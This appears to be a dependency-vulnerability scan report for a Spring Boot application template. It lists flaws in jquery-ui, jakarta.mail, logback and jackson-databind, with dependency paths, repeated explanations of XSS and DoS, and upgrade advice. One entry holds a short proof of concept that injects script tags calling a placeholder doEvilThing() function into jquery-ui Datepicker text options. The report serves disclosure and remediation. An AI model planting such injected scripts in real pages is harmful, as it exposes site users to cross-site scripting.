Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

A fix was pushed into the master branch but not yet published.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: org.webjars.bower:jquery-ui
  • Introduced through: org.webjars.bower:jquery-ui@1.12.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.webjars.bower:jquery-ui@1.12.1

Overview

org.webjars.bower:jquery-ui is a library for manipulating UI elements via jQuery.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS) when accepting the value of the of option of the .position() util from untrusted sources which may lead to execution of untrusted code.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

A fix was pushed into the master branch but not yet published.

References

medium severity

Cross-site Scripting (XSS)

  • Vulnerable module: org.webjars.bower:jquery-ui
  • Introduced through: org.webjars.bower:jquery-ui@1.12.1

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.webjars.bower:jquery-ui@1.12.1

Overview

org.webjars.bower:jquery-ui is a library for manipulating UI elements via jQuery.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). When accepting the value of various *Text options of the Datepicker widget from untrusted sources it may lead to execution of untrusted code.

###POC Initializing the 'Datepicker' in the following way:

$( "#datepicker" ).datepicker( {
    showButtonPanel: true,
    showOn: "both",
    closeText: "<script>doEvilThing( 'closeText XSS' )</script>",
    currentText: "<script>doEvilThing( 'currentText XSS' )</script>",
    prevText: "<script>doEvilThing( 'prevText XSS' )</script>",
    nextText: "<script>doEvilThing( 'nextText XSS' )</script>",
    buttonText: "<script>doEvilThing( 'buttonText XSS' )</script>",
    appendText: "<script>doEvilThing( 'appendText XSS' )</script>",
} );

will call the doEvilThing() function.

Details

Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

Types of attacks

There are a few methods by which XSS can be manipulated:

Type Origin Description
Stored Server The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected Server The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based Client The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

  • Web servers
  • Application servers
  • Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

  • Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
  • Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
  • Give users the option to disable client-side scripts.
  • Redirect invalid requests.
  • Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
  • Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
  • Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

A fix was pushed into the master branch but not yet published.

References

medium severity

Improper Neutralization

  • Vulnerable module: com.sun.mail:jakarta.mail
  • Introduced through: org.springframework.boot:spring-boot-starter-mail@2.7.3

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 com.sun.mail:jakarta.mail@1.6.7
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.0.0.

Overview

Affected versions of this package are vulnerable to Improper Neutralization via the handling of SMTP message input. An attacker can inject arbitrary SMTP commands by supplying specially crafted input containing carriage return and line feed characters.

Remediation

Upgrade com.sun.mail:jakarta.mail to version 1.6.8, 2.0.2 or higher.

References

medium severity

Improper Neutralization of Special Elements

  • Vulnerable module: ch.qos.logback:logback-classic
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.8.

Overview

ch.qos.logback:logback-classic is a reliable, generic, fast and flexible logging library for Java.

Affected versions of this package are vulnerable to Improper Neutralization of Special Elements via the JaninoEventEvaluator extension. An attacker can execute arbitrary code by compromising an existing logback configuration file or injecting an environment variable before program execution.

Remediation

Upgrade ch.qos.logback:logback-classic to version 1.3.15, 1.5.13 or higher.

References

medium severity
new

External Initialization of Trusted Variables or Data Stores

  • Vulnerable module: ch.qos.logback:logback-core
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11

Overview

ch.qos.logback:logback-core is a logback-core module.

Affected versions of this package are vulnerable to External Initialization of Trusted Variables or Data Stores via the conditional processing of the logback.xml configuration file when both the Janino library and Spring Framework are present on the class path. An attacker can execute arbitrary code by compromising an existing configuration file or injecting a malicious environment variable before program execution. This is only exploitable if the attacker has write access to a configuration file or can set a malicious environment variable.

Remediation

Upgrade ch.qos.logback:logback-core to version 1.5.19 or higher.

References

medium severity

Improper Neutralization of Special Elements

  • Vulnerable module: ch.qos.logback:logback-core
  • Introduced through: org.springframework.boot:spring-boot-starter-actuator@2.7.3, org.springframework.boot:spring-boot-starter-cache@2.7.3 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.3.8.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-starter-logging@2.7.3 ch.qos.logback:logback-classic@1.2.11 ch.qos.logback:logback-core@1.2.11
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.3.8.

Overview

ch.qos.logback:logback-core is a logback-core module.

Affected versions of this package are vulnerable to Improper Neutralization of Special Elements via the JaninoEventEvaluator extension. An attacker can execute arbitrary code by compromising an existing logback configuration file or injecting an environment variable before program execution.

Remediation

Upgrade ch.qos.logback:logback-core to version 1.3.15, 1.5.13 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: com.fasterxml.jackson.core:jackson-databind
  • Introduced through: com.fasterxml.jackson.core:jackson-databind@2.13.1, com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.13.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.jsonwebtoken:jjwt-jackson@0.11.2 com.fasterxml.jackson.core:jackson-databind@2.13.1
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to net.sf.jasperreports:jasperreports@6.20.1.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-databind@2.13.1
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@2.7.4.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.4.

Overview

com.fasterxml.jackson.core:jackson-databind is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.

Affected versions of this package are vulnerable to Denial of Service (DoS) in the _deserializeFromArray() function in BeanDeserializer, due to resource exhaustion when processing a deeply nested array.

NOTE: For this vulnerability to be exploitable the non-default DeserializationFeature must be enabled.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.12.7.1, 2.13.4 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: com.fasterxml.jackson.core:jackson-databind
  • Introduced through: com.fasterxml.jackson.core:jackson-databind@2.13.1, com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 and others

Detailed paths

  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.13.4.1.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0 com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to com.fasterxml.jackson.dataformat:jackson-dataformat-xml@2.20.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.jsonwebtoken:jjwt-jackson@0.11.2 com.fasterxml.jackson.core:jackson-databind@2.13.1
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b net.sf.jasperreports:jasperreports@6.19.1 com.fasterxml.jackson.core:jackson-databind@2.13.1
    Remediation: Upgrade to net.sf.jasperreports:jasperreports@6.20.1.
